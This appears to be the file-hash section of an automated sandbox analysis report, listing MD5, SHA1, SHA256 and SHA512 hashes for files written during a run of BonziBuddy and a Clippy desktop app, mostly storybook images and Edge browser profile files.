| MD5 | 4f25fd90fff473840ef608d23efb3967 |
| SHA1 | 76e3b424c934e67d35fac4419f8b5561ba1f133b |
| SHA256 | 0f36eb4f571237452098816d03de25c9081625391a2295a5db4cd0a01933ddfc |
| SHA512 | 99b21e3431865bff3b9ad871a53a874d382b8612f1651198d03190e23e189dfaebeccde2e85ac8b59148a7c44487187ebc4b86c5c9d08286b3e27497a4e57306 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page15.jpg
| MD5 | 3e720f815cd37130935c0be313d7fe4b |
| SHA1 | 7005998c4541f6da091379f748af5394fe2b221d |
| SHA256 | e71359b05df80c15916fb273710c8a87702af891b11734663cf538a6baf0a32d |
| SHA512 | b665452711869dd9d774a87daf988041b5538d6bd903bbf7038193af9e13ecfbad9420dc50f03486995b76082c07d03da5d67a0858d2b0325e51a8ef8814e295 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page14.jpg
| MD5 | 628fa9eb07409a1cbb50639f2c6f29f3 |
| SHA1 | e1f92ed329cd99f69112059b8f7e60879ad4ffc7 |
| SHA256 | 8882f1cf6f0cae626f8677ff3d1b415a5df88f32b7e6f94690a5997823b4916b |
| SHA512 | 68b53043af8a63a559bb1f3490a05d604bc5bd54e38d9121bb5730c12e8d1a6a0100ddeb86b705e0f6f38f6dcf3e20a3e8ab6e9b062a3c7e3d3429712a0c5735 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page13.jpg
| MD5 | d8937305db2397be4d2d5aa50eccfa18 |
| SHA1 | a9e268193ac84de7383599ae766d4ea7fd2a6321 |
| SHA256 | b5c0c80f4c8f8b83cfde14a90c04b7eb6c3cd01b1e8dfa92e398937c90e0e883 |
| SHA512 | 9ad9dd0f5f6f005fa411550dd2fa649e3dfb2e4e179a90f2648ac66eeb45097b7e01b927488a61e9010c99bdcb4b07ae192cd40e06648b97a3aaaa6f754ca511 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page12.jpg
| MD5 | 739c4dcaad2aa6951b4c6b924d4078bc |
| SHA1 | c85b0346d0bb95817ee94042b5e6bb4c1dd7065e |
| SHA256 | 01006d2e7052d985101f0bce9c901c04fd55cd1cfb5e2d23385396f7e88e8fc0 |
| SHA512 | a22e34ac31a6b8d98f8901b5f75faf0f5ee5c362781bc81d3135ef48cc63a30613f6db120b3716ff0094fae016f0be231557c41e31c6f40f8ea8bb2bb7d2aca1 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page11.jpg
| MD5 | 7e1f1a4d240a827c40e9f3cd47d169e8 |
| SHA1 | a8587b711a0cbe45d6821750baf584d629e8c8d3 |
| SHA256 | 6a584c706ff3383b476fc4e55e7c16f0661c30c622237094f302db2f6cc7238a |
| SHA512 | 30586da3a9227a91fd3437f9fc1aed54198a805ab970dd221bad7aa6ea47be598455ae54e3e5b664b01f60fe99736196f42fb832a10613b570ad162a4647bfaf |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page10.jpg
| MD5 | e86ba8546995f30e9dd40e363f7de50d |
| SHA1 | 4cd4146839f61ae3709849a33a0bb95cba76d9ad |
| SHA256 | dc60db3b80e4c049bf870b2ce9981fefba35fba7afba5e60d75b9c0dac8ee141 |
| SHA512 | 88b50c7f7257d9e58f554e1d11cbcda57e30f56ce434a240f07152f6cf85ce4369e0185a9c3c96b18b886c22f35fae1383bfc79fb2d8c607659cdf5e19a5e450 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page1.jpg
| MD5 | 20ca931b49f42be729c409e5f4b719d5 |
| SHA1 | 54948429d371f838d5c24817736442350941d4e2 |
| SHA256 | a40837d0619a98a96a5a5cab016ba35694914607665d6cdd795ee0076f56aaac |
| SHA512 | 196fdb931daa28dadb29dc2404f61ae9cba007680738da87fa7fd425e05778454286127dec4e8756d88a73f27e3267e36eba19c731f73dbbbec08c4adfccb079 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page0.jpg
| MD5 | 5d7dac6e837598fca17bc6dc6808921d |
| SHA1 | 8bea5a903042d1ca004b3307c43f4aa9fbfd27f9 |
| SHA256 | 6623c9cdac71de0076ec405505ee66671423752ae1c4d107963b41fed6234280 |
| SHA512 | 89c6af39a469efaf80f467ce910e9272dfae0fe0ca50ebeda8ecda3007e39548d2b8ff582cd9a2cca075ffe309b4103fa723a73c5f6117c8f0720e3124d1080b |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\book
| MD5 | e2b9604a4c6c86aacc681d8e2e6b251f |
| SHA1 | 39b684099529adb2bfb78d0dd1233b03c9fc6528 |
| SHA256 | 486c7e2d25096d871171fff1906c65f98e8c1fa888cc5c18558140f999274d4e |
| SHA512 | 6ad292e3d20dfd42228387181322ec6d4622d35b85829910f760a3fecaf110a93f000e3cbdbc575cf8a95f6d621af04b973e7c027667f8b9adfe90273464c632 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\Thumbs.db
| MD5 | 91122bf7c12c199558ac2f24bcacbcb2 |
| SHA1 | bf3cacf426b9e76348e2f4da0922c510cc83c004 |
| SHA256 | 2637ab06ccab00a9b6937c7d2c02e42a46d98f4351bed5236801ad3d3cad98f8 |
| SHA512 | dd52a1b2edbcaa11adab884de710edba1f42b47c53eb872cdb7f0710d550921a831aa85562a3dfaf1de9275b234d4f152e5c35350bf42674425a83c6e2db1da8 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\sp001.gif
| MD5 | d1bf19f98e5b064078d2fdc074d9893b |
| SHA1 | ecae2d5f2c6fe28e03baedcd84a27f0dd4ca51ff |
| SHA256 | 3a91e9c0f4514096923eb665974724e63c3037c224ce156be44cff2c1a35fb1a |
| SHA512 | 883f5327d6049237a66895b4d9a5e2ca49c8504582dd35201ae0e7de3262f2d729e3b7b1f4c795fd2d5d6d1cd89de8c3c3b0d3ce297ed6ef5d3494fb378a6df6 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page7.jpg
| MD5 | 55e51b0b399dfd183b5fff6b51f5af84 |
| SHA1 | f665b4c226cfdb5407e3cdd58201521d88131595 |
| SHA256 | 799e45d8227d2a9718fe85a3d3281cd4f0ca47a634e72dfb3beb253968c438e4 |
| SHA512 | a5c55f96b72a870ff79d0b8d56275944f069735e5b46df6ac6e48db1457e5a56633d8881bdfe574868e3edff1332b18d785858ab94dd5f492f034820d293cc0f |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page5.jpg
| MD5 | f11574849d29f607d21a21b28765f686 |
| SHA1 | 3546773053192e0b4044561af8f6e322f0eb585c |
| SHA256 | 0824f38b3169496765f8d1b6cf925af47a1b53940c7b1c52e4f30cd770f5ad01 |
| SHA512 | 1c67fae3befb86a371dd546c42a6da18abcc23b36bf811c885e0972814a7338ecc027732b1e9497183b7340c06aebc17098abd7fa1821ffb38fa572aeca27e1f |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page9.jpg
| MD5 | f7a203715b8a65b20855de0ef6769c67 |
| SHA1 | aa1f011ce44d4beee0d29379dc17a8e09ad7d22f |
| SHA256 | 215a885eb08f1cffce16c785be47456b38d17fb1485ede519d256d3405fc58da |
| SHA512 | 5fda653e314001e6c27df1507bbed7675da23fe883af9c28cb3aa5eb5fe9a13438daa50bc87114a5b1d521b74265f91124baf60a301bd634fd9c06db91845a56 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page4.jpg
| MD5 | 1501134aa82fc7f1a967560b85518ce3 |
| SHA1 | b39f0a515c7f19cfdcf35bcfa03f46387b2477bb |
| SHA256 | e738143197ab2c1655345f29a3e89cdd65250d4eb631cfc930fb36abc4aff153 |
| SHA512 | 286e45a571d8fd8a999f65ae571adf4f5dbb9c715ec70938689d224d15843e7dd8695f3c94ae0a5777f4d90416787c37400dd54a9d0ded4e9a953afd7a2f5b53 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page3.jpg
| MD5 | 6f5cb5263b60cf2ca44f87faf8a51e98 |
| SHA1 | 774604cb4230782eb551a4a37aecbece3fc4f4a5 |
| SHA256 | 9080f1863c1c1b92068972bff9b7dd81b5abd314216f832879411d09b080de0c |
| SHA512 | 84c9f549cc7a634005f99e731288906eef432fdceb25396a90266a765721009ee8643fa84466392b80b60d69b5b798e75218691a723e5601c962300eea5c46f6 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page2.jpg
| MD5 | ceb7742d1bf22a39caaa45cafef4a7b1 |
| SHA1 | 37efafae5d2326cf52644304d4a06fbe826821c2 |
| SHA256 | bf164e9e1b512dee0902b66d39c9e8b7a9bf8b25beea206d593c93fe60816502 |
| SHA512 | 18fd22e878e4931db7b62a9a61c75c9c540ff769c8ac17d9dbe56a2a335f7d07fa945e9f69593c219522e9bf00473b4f1784b96c094fbd3aa35b2e1d6ee27958 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page16.jpg
| MD5 | e0de2c8139107ec64bde2b51f61014aa |
| SHA1 | cbe82dadf635d5f8e4321fcf5000064884814085 |
| SHA256 | 1cf3ec993c10248ae71928616ed8f6747be08cfcaa2a5ebb8336eb0a83bbd992 |
| SHA512 | 35c48f95917865178c9636b44c6ce9916f0c5911f81545f87d3a2a481e8ee22a35e8cef671b44d5e3ad63a399f8f5145b2a2fd43d131030e4ad17fe1bc5928ac |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page5.jpg
| MD5 | f333bc11d62a7eaf7cf4f0ef71078863 |
| SHA1 | 389327a5c4a7b86de347726a6ab815eaba9d53f2 |
| SHA256 | ffd5d52c98932d4feddfecd7aee546860c7fb46b6209dfc203e51a07c395a412 |
| SHA512 | 9cfc8ca1e0fe9a5c152738494ad010aa35335eb40433d2b0eb2825368d5d23147daf636436c2a49f244cd101176678cd91b895bebca640372347758d92d74651 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page6.jpg
| MD5 | b08b80d893510c78e9830c91139e4370 |
| SHA1 | 82c85eb44e6f3cc710aa605581c3721673c41302 |
| SHA256 | a5b2142913ac2983dbfaca6bb6c6743c762cf6c2edd3ddc2778e7b23ca0cc3d6 |
| SHA512 | dccde152efd04624b45b32f48e9f9891cba41e04871d06a72e57a4c43a1c497219c726347741382d07c79667515883329f06ca3511ca2655cc5fa5bb19fc7631 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page4.jpg
| MD5 | 3f85711e30645829fc1ab0e2c338ee59 |
| SHA1 | dce77cd7d9513f092f6c2517d735444f678125db |
| SHA256 | 256aba539c9dfc725ecbb8925aef9e75435ce034597e16cdc21a4275c0ef814d |
| SHA512 | 40b19fa25a18b4a768811b6fd3decf10fbaffedb9f267c4d070c21871e49c01b511a07f86d09a8fb41a57c28c7cf6fb2944e202d9c6296073aef4ab47439722e |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page3.jpg
| MD5 | f2849d9e002cdfb7f49fdd599814d399 |
| SHA1 | 716b514a999ea2eaa130e09bd194bb2464076a08 |
| SHA256 | a3cb8b835b33194095574d7a0eb26bc11f92189711abe86785918f848999add3 |
| SHA512 | b2e4e55fa0f38193e785f3c5938c76aa538d0ce111c0197f7112b8713e26854b9f599df277b07cf0ff9f726d4af526ed754d5338791c3f339a41779fb302d31c |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page9.jpg
| MD5 | 3ad3093c88e7c3d5a15fd2bcf8951abf |
| SHA1 | 968617d0c5ffbaff35d5dd38b222ab9645987827 |
| SHA256 | 0244e5c87ea823b5741c101129a3ab8a5dcbad798bde86ca15a838a777b26b67 |
| SHA512 | 53b2631b75cc7be8a6f5d687612521a4443ec7c9b6111ec1605c04ce2b04abb674962f37485ee3590573e62b7bed2b5c121d8f6277c3eca0f965b25e0ccd658c |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page8.jpg
| MD5 | a9550dd62d93b2e7dfd2fa722311038e |
| SHA1 | d9a8368accb18dbd0e3f8dcdc224f34e026a1e48 |
| SHA256 | 26040bf12d19bbe6c852237570e9a3722cc7dc7b11f4f2633aea014287bf3153 |
| SHA512 | 09d849af3361577a64bc77758193f1094c10ba5b443a7fe5ca81ea18daa5ffc9d871ce1e5585c492ba571629e02286055c0fd02d0fa29715118fb4fa7f64e8e1 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page7.jpg
| MD5 | a3bf21eef4dccfd537856c47e8476db1 |
| SHA1 | a748d1c7f4320ef79471e5375548d08824063a58 |
| SHA256 | 62c6f4ee6a937eed4c0d93ba1e07f290005e4a9158da345dfd64656906f7e0d5 |
| SHA512 | 497c445b1ed3afcc04df7a07f7d6f22c127fabcf8cdca936a5ed54f9d828cd3cc2a423216e3a7dc0bc038bf3219b70d1daf48107dde0fd7e9ff3709853042659 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page15.jpg
| MD5 | 447002498b5ba164f447e955afb8b85f |
| SHA1 | fef56f859c3889f2fe84e0381605a7bd975b9ea0 |
| SHA256 | 8a84938419a1f2a1895e482d2343cfb84a21ba2cd0053de298ac9315ead17dd9 |
| SHA512 | 368eb3e01791014d64b5e2409d6f51e367d578ed4b44ef0a779e2fc09fd79c73cee3ddbd4ce6df38641ad90afb117e115413f497e3fbcbd43bd299f264950c4a |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page14.jpg
| MD5 | 746b6a0f5c5cc637ff48394408b305e0 |
| SHA1 | de128d29da3918cc229d595091c2adaee68718c9 |
| SHA256 | 5c9c5b27a5104c494e657cd9d1d17b58338c3ed34dd38f51ad3a31d935bc88ee |
| SHA512 | f43374471da73fe8839b87cb9b857de00ebb7ff573096eb37e9ea66dc8e4d444c03b67971dc6a65fb5d1fe88976468452e83ade73d4e4f6b52f41baca39fee57 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page13.jpg
| MD5 | af87095f0801e28bc9443aa19953bbbf |
| SHA1 | b66a33b500769869a9b4a57cdf8d199e8a0cdf47 |
| SHA256 | ee4abbebc89abb59e830f51932dc25bffd87debdff9813ce0eec216bedb0cb9c |
| SHA512 | f3bb8d9e77e18dd37eb0ff4b94d92babef0830682338578f851766913c0f0e2b4f5283b260f2bac7c6bc8e5736d9dc8c74e872392f96b493197f1284724a506c |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page12.jpg
| MD5 | 13ac61ed6148d887ec6571e181ddb11b |
| SHA1 | c3ab267bb353460da4c8505f343078bf97a9a6bb |
| SHA256 | e42286e86415ed7ff3f5206909cfbc2a8111d9aea7160b06d73e71072f8fa8f6 |
| SHA512 | cc6293db93f1e3d503a91377ca03c16701aee403b2c704ca9e1bac54c06b5ab55ac5a63c1951051359098df42756a67043a3ad09c07ce787f27d108eb8bbcacc |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page11.jpg
| MD5 | e8462a12a60c127b7a231218cba2ca41 |
| SHA1 | c922d146f8111cbe053df6c7fe2241b4d006047e |
| SHA256 | 1c2bf464976420ef71b59dbcb0fd16c20daec31f0fc5c03dbb3a4a5172c35712 |
| SHA512 | e2c2319dcddefbfba1299e3e58119077084c6c3b7f0eaf1d12991cea6510207b0d44712dd214d2f7fd08ed61520697908390b7e7c20ee0920b4766be0d6520d9 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page10.jpg
| MD5 | a4ea32bc6c92c2cf5cfb2593f72ca463 |
| SHA1 | 22ad90eeda027f59d41943e93b2ce8668baac676 |
| SHA256 | 606583c58aff143468c40e839c11710a9558c47b94d5a86d1151446f4c137404 |
| SHA512 | 8d365184033b5fcf85db7c6c5fafb3e324050c96eb954db9bf2758e067d0513d7dd0754c1d9fbfab153ad2d05ee51d7afbfff24ed7605bda745d9a2af705fea2 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page1.jpg
| MD5 | 170d89270e03dc2e7da9309abc47988d |
| SHA1 | 80227ad1bb344c35e156dd953299aacc9742a0f3 |
| SHA256 | 8edfe12a1d8674de7922a53aea1c8acd93a4e9b516e5c323f128e963aac974ea |
| SHA512 | 0b5fe93a12362dc8012dbd31d95746d3d4d4ab99a219e0ab49861116c13b6f5d347e23c6fad323d533b9ec11001c57774ed7db84a9a7ac916c0426ecb44fce88 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page0.jpg
| MD5 | 41386e0f455fbb9776aa8176b463b488 |
| SHA1 | 5655105d8fb1f6f0d20ac2f0e154c5af9dcf581a |
| SHA256 | 314fb3fad61f23649e79e63f3e0644dd8a0f8fd219e489f8d6d2ad7893e60f0e |
| SHA512 | b887a0fbe312dc5bb7c94f21327d8bb09f440ca3dd5187dd65baf0d75670d4e665e4fe99929c0662d4e95a3123b4114ed66fa51ec3575f7258a36163bb30d3fd |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb016.gif
| MD5 | 7ceaf70c43de87fe8f7106c5c024c6e8 |
| SHA1 | 72456f529f2e15112a57609950d5909c38471c61 |
| SHA256 | 7fd940a10524ed7aedb21658407cdbce0831475a51d7af081f1deacf9816fff0 |
| SHA512 | 382d8be5378ad62d238bacc4a45b93728d214c026afdd2a23a3854392b8f6ba617ea2e477c583d3de843d900f9a67d557b437fadc99dd29980db41bd6e09d3c3 |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb015.gif
| MD5 | b9d7d09a834dc4541967ab78f7d0fd03 |
| SHA1 | 9581e21ef862542ef9f6263ac81377c7f3469b0a |
| SHA256 | 84f12116cfbeeee6373bb94a0d878e134fff50d598d6f1578f4131d23be3703d |
| SHA512 | a879dbacb814e1495f73a8a56aa46edefc6523ef9badf3d1845b6f9b234bb4daaea8d9537fd0babc4412c577860a1378802fe0a1bbe28a71283e4d5105c4176a |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb014.gif
| MD5 | 0c47d03a6d75689e2f84b925f87561de |
| SHA1 | 4782d1a60796d24f2406e35d18ee4c8fef59b64e |
| SHA256 | 963bb112090949111b885ab790c9e032784d9dc6c0fb3388f47d011f5bdf6c7a |
| SHA512 | c4e96977c2adfcd69cff2b22ff802bda3ae0c0ae6bfe3e2f1800a430d2f06749e450b4a39132be3e58c20e39e333eb7c79386ab69e8efbdb6256959c4a5a5feb |
C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb012.gif
| MD5 | 03ac2cf533ad921fa2e570449c398d60 |
| SHA1 | b77a69ac67cc2ac113d997bf3c3d4cacd60b193d |
| SHA256 | 47f4755a428995775089a622f33eb54c4505d8a6ad7963c6de646de0b2156017 |
| SHA512 | 74acc8d75fcd3fdae5101b401e84042b6c04b3bd2347937d007201ffc9bcd06b84915beab9f58b3e1f0c09d9f49660eb979ff1d0d75db1e3396c31a5ebd0a794 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c59685b1f099b1507d7532998b132ada |
| SHA1 | 3a2307bf0ea52d8ece2accccb687806f777599b3 |
| SHA256 | 4da8c9ca07e9e1ee2e39fb5366e4d3be9edc005e79cc036fe496aaac2038f233 |
| SHA512 | faffc0c29d7213d61910076b9f25d541a0ada9ad7c3c6433b36a81d76c0fe4d4d5014b22c159452dcb5406151de85ce5ce8687ec6d851a9b6b20677700b4ca7b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 1d8714e833aa9db8e967c5e907a1e415 |
| SHA1 | 27e3e2b6ef8cc919718838dad24eb6f7f103c957 |
| SHA256 | 693b846ceb152a9654668fea46b19fde13921531c79152f152cf4c46aa6ec94a |
| SHA512 | 40b187f59d048f4c1f0e37a5af97a746d671a2feaf260893b8bf756ae51f3f0b1abaa8875aa9134d1da4098932e64b0fde6bd58da6e52807f63d311843afc822 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 41025e111e1da45e9e6822a048590cf3 |
| SHA1 | 219fd56aa104efdf67cef6ed90d502ab5e8aaab5 |
| SHA256 | a463db2e287b713ef67ea67514dd7faf9782539b834e321f07b18d6d703bff49 |
| SHA512 | aba3d07c098e57dcad3e99453131b6b1c1c9d8d5faa42fe10a070aed51dd9b9d1e1bc2368c80be0885b3ab45a3d3b6dcc8074a7d2a6eae7b1a599d6bbb2b1114 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 4a4dff11ef25385ff812e114ce279b80 |
| SHA1 | 256aadc8e7ce0b197fc8fdd8d3762fe41a2cba31 |
| SHA256 | 87e9910c83c8a9049ef2fb6bd71694e102fcae5c0d4948c1a70b7cd71007b486 |
| SHA512 | c81fc22846a7962c7adf0d396c9d3798ee82896eb8baa77f6070ae589a11e40304eb0b099ffbca0aabaab9e784f0220ba10ea0feb0d0a10870c0ed55181a92d1 |
C:\Users\Admin\AppData\Local\Temp\Temp1_clippy.desktop-win64.zip\clippy.desktop.exe:Zone.Identifier
| MD5 | 877e20bb2216f324cdd9c456cda13b5a |
| SHA1 | f5212f9228f4a18916673f702025b66c4663c228 |
| SHA256 | b096adf373c92f4eb32c46878343391a523b1d50507ccf20686ccda9931f82b7 |
| SHA512 | 0c39255695f387b8afa9761a454f75ffef2e8a7fbb54e8ad837e9e01075aacbfbe462293ee5ba6aa3198126816f87b6a79f60fd2143dfc08e6b9ba0769d39e97 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\H3PMCBH8\www.bing[1].xml
| MD5 | 1d8559d1f2ac8e5d69ea65dd0d40d04b |
| SHA1 | 183e0eb7b1d81cf36914ed0e0edbe17bd5cee8ea |
| SHA256 | 0c65b406995d28a1f51f47f7e21a378290d83ede2645eacb75d89ce0a93d64a6 |
| SHA512 | e1fb0ab75fd5eff02d0a4ea3730b0e921e65f074b2ffd4c6c11f7574b16bb0288e9fb8a27222160fbb8064d589fdd17cd60cb94321f32197061f784f491dc90f |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ab3e65a6-923a-41f9-b8c7-072a20599601}\Apps.index
| MD5 | 7ab30bdbddadf1506e63dfc0d6f77e93 |
| SHA1 | 02d32923e0dc7bd12987d7235d7ca25295af2f2a |
| SHA256 | 798f02f47213af2ba67f576f192bcdd2a98e65e0e147f751c98acf19b7ed1c6f |
| SHA512 | 63b399c63aac62a4948bbade53cac5b8a1997c44d37f422a5bac8daeff22fb377a958b1162279f748d63a4e42cb56aa95d04c075ec518eb74412738070d794b9 |